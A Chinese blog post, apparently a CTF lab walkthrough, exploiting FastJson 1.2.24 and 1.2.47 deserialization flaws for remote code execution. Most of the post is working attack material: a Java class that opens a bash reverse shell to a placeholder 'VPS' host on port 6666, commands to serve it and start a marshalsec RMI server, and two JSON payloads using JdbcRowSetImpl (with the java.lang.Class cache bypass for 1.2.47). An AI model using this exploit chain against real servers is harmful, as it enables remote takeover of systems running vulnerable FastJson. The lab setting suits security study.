FastJson1.2.24/47 Rce

最新推荐文章于 2023-09-18 16:33:37 发布
最新推荐文章于 2023-09-18 16:33:37 发布
阅读量418 收藏 2
点赞数 2
文章标签: java json 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44687621/article/details/124340427
版权

之前只在本地测试过FastJson的漏洞,实战情况下一般需要利用VPS反弹shell,这里尝试一下

环境
https://buuoj.cn/challenges#[FastJson]1.2.24-rce

构建rmi服务器工具marshalsec
https://github.com/RandomRobbieBF/marshalsec-jar.git

FastJson1.2.24

首先编写恶意类

import java.lang.Runtime;

public class Exploit{
    public Exploit(){
        try{
            Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/VPS/6666 0>&1");
        }catch(Exception e){
            e.printStackTrace();
        }
    }
    public static void main(String[] argv){
        Exploit e = new Exploit();
    }
}

编译后,上传到VPS,在对应目录下运行python3 -m http.server 2333,如果打不通需要检检查所有端口是否关闭防火墙。

检查恶意类是否能在本地反弹shell,并检查python启动的服务是否能正常访问。

在这里插入图片描述

使用工具marshalsec启动RMI服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://VPS:2333/#Exploit" 9999

在提交的数据包中

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://VPS:9999/Exploit",
        "autoCommit":true
    }
}

即可连上shell

在这里插入图片描述

FastJson1.2.47

同样的办法,只需要修改最后提交的post数据即可

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://VPS:9999/Exploit",
        "autoCommit":true
    }
}
一睡12点
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
fastjson1.2.24含源码
02-04
fastjson1.2.24含源码
【Bugku之Java Fastjson Unserialize】
qq_40646572的博客
05-10 618
打开题目,花费金币,心疼ing。 打开题目网站,发现一个登陆页面,先来波bp。 bp抓包后发现,这个发送的json信息,结合题目给出的fastjson反序列化,应该就是直接在这个参数上传payload了。不慌,先发送下看下回复。 咦,好像此处回复有点意思,好像是源码,直接打开这个地址。 没错,这个是源码。先打开看下,是否存在有用的信息。 编写exp test.java test.java import java.lang.Runtime; import java.lang.Process; .
Fastjson RCE漏洞复现和理解
Delphinidae
03-28 2266
漏洞:fastjson 远程代码执行漏洞 漏洞原因:fastjson在执行反序列化时加载数据被注入,注入的数据被解析执行导致任意命令执行。 漏洞历史:现在fastjson的版本已经到了1.2.73了,但是历史上高危漏洞频繁出现。 如:1.2.24 出的反序列漏洞,经过对类的黑名单限制和autotype的关闭、checkautotype等,还是还被绕过限制,如:1.2.471.2.68 的漏洞,都是绕过限制加载恶意的类并造成远程代码执行的高危漏洞。 漏洞复现:复现版本是1.2.47。 漏洞复现github上
[BUUCTF] 集训第六天
Dannie01的博客
10-03 1284
[BSidesCF 2019]Futurella 火星文 复制粘贴搜索框就可以获得flag 看源码 轻易得不敢copy flag [GYCTF2020]FlaskApp 这里会自动重定向到xss平台,很迷 flask debug可以找到源码 flasky 尝试ssti模板注入 先重定向 点击返回拿到base64编码去解码 同理点击+返回操作 {{7*7}}不可以 {{7+7}}可以 别问为什么 有waf 读app.py {% for c in [].__class__.__base__.__
Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)
oiadkt的博客
04-12 867
Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)
【漏洞库】Fastjson_1.2.24_rce
yuan_boss的博客
09-08 952
我们可以看到connect方法中具有JNDI的lookup方法,lookup是JNDI用于查找资源的方法,里面传的参数是dataSourceName,所以我们可以在payload的json字符串中传入这个参数dataSourceName,并且指定他的 值为我们的RMI服务或者其他服务,lookup就会到我们指定的服务中下载恶意代码并执行。fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。
fastjson-1.2.24.jar
02-24
java运行依赖jar包
fastjson-1.2.24
09-22
JSON4J-1.0 IBM JSON4J 类型是受支持的实体类型。JSON4J 库包含在该产品的运行时环境中。您无需捆绑任何附加的库。
fastjson 反序列化RCE,远程命令执行漏洞CVE、CNVD(2022年12月最新)
qq1140037586的博客
12-18 2076
漏洞利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据进行修改,增加,删除等操作,对服务器造成巨大影响。
[Vulfocus解题系列]fastjson1.2.24反序列化RCE (CVE-2017-18349)
00勇士王子的博客
03-22 5597
前言 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。 Fastjson1.2.24版本爆出了第一个反序列化漏洞。第一个Fastjson反序列化漏洞爆出后,阿里在1.2.25版本设置了autoTypeSupport属性默认为false,并且增加了checkAutoType()函数,通过黑白名单的方式来防御Fastjson反序列化漏洞
网络安全深入学习第七课——热门框架漏洞(RCEFastjson反序列化漏洞)
最新发布
p36273的博客
09-18 1391
json全称是JavaScript object notation。即JavaScript对象标记法,使用键值对进行信息的存储。"age":23,json本质就是一种字符串,用于信息的存储和交换。------ Fastjson 是一个阿里巴巴公司开源的 Java 语言编写的高性能功能完善的 JSON 库。可以将Java 对象转换为 JSON 格式(序列化),当然它也可以将 JSON 字符串转换为 Java 对象(反序列化)。
fastjson1.2.24-rce
不知名白帽的博客
06-19 1965
fastjson autotype在处理json对象的时候没有对@type字段进行安全性验证,导致攻击者传入危险类,并调用危险类连接远程主机,通过恶意类执行代码
Java - FastjsonRCE攻击模拟(远程代码执行漏洞)
Zong_0915的博客
12-03 1424
Java - FastjsonRCE问题分析及攻击模拟(远程代码执行漏洞)Fastjson出现RCE问题的必要前提分析 首先,本文的Fastjson相关的RCE问题,针对于版本在1.2.24以下的。 Fastjson出现RCE问题的必要前提分析
Fastjson反序列化漏洞(1.2.24 RCE)
m0_61506558的博客
09-13 2893
Fastjson是一个JSON工具库,它的作用就是把java对象转换为json形式,也可以用来将json转换为java对象。@type引入这个功能的目的是在序列化的时候防止子类中包含接口或抽象类的时候,类型丢失,这样我们在反序列化的时候就不需要再指定类名。
fastjson 1.2.47 RCE漏洞保姆级复现
ALLEN'Blog
02-01 1251
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson
云服务--漏洞修复
Knight_Key的博客
11-18 1579
Spring Security 身份认证绕过漏洞(CVE-2022-22978) FastJSON<=1.2.80 反序列化漏洞(CVE-2022-25845) Apache Commons Text
fastjson 1.2.24 反序列化导致任意命令执行漏洞复现
ZxC789456302的博客
09-27 834
开头吐槽一下重装完的kali,太折磨人了,环境重配+各种出错,人已经麻了....需要用到①的jdk
rmi远程代码执行漏洞_Fastjson 1.2.47 远程命令执行漏洞
weixin_39919195的博客
12-22 420
各位大佬,最近好么由于找工作,以及适应新环境,导致快3个月没有更新文章了,感觉有点对不住大家。话不多说,今天带大家复现一下Fastjson1.2.47远程命令执行漏洞。漏洞实现流程准备环境本次漏洞复现需要有三台设备(两台也可以)主机A:模拟Fastjson漏洞环境(centos7)主机B:模拟攻击机,需要开启web服务(windows10)主机C:搭设RMI服务(可以同主机B配置在一起,我的环境是...
fastjson1.2.24rce漏洞复现
06-06
fastjson1.2.24rce漏洞是一种Java反序列化漏洞,攻击者可以通过构造恶意的JSON数据包,触发目标服务器上的fastjson库反序列化漏洞,从而实现远程代码执行。该漏洞存在于fastjson 1.2.24及之前版本中,已经被修复。如果您使用的是fastjson 1.2.24及之前版本,请及时升级到最新版本以避免被攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值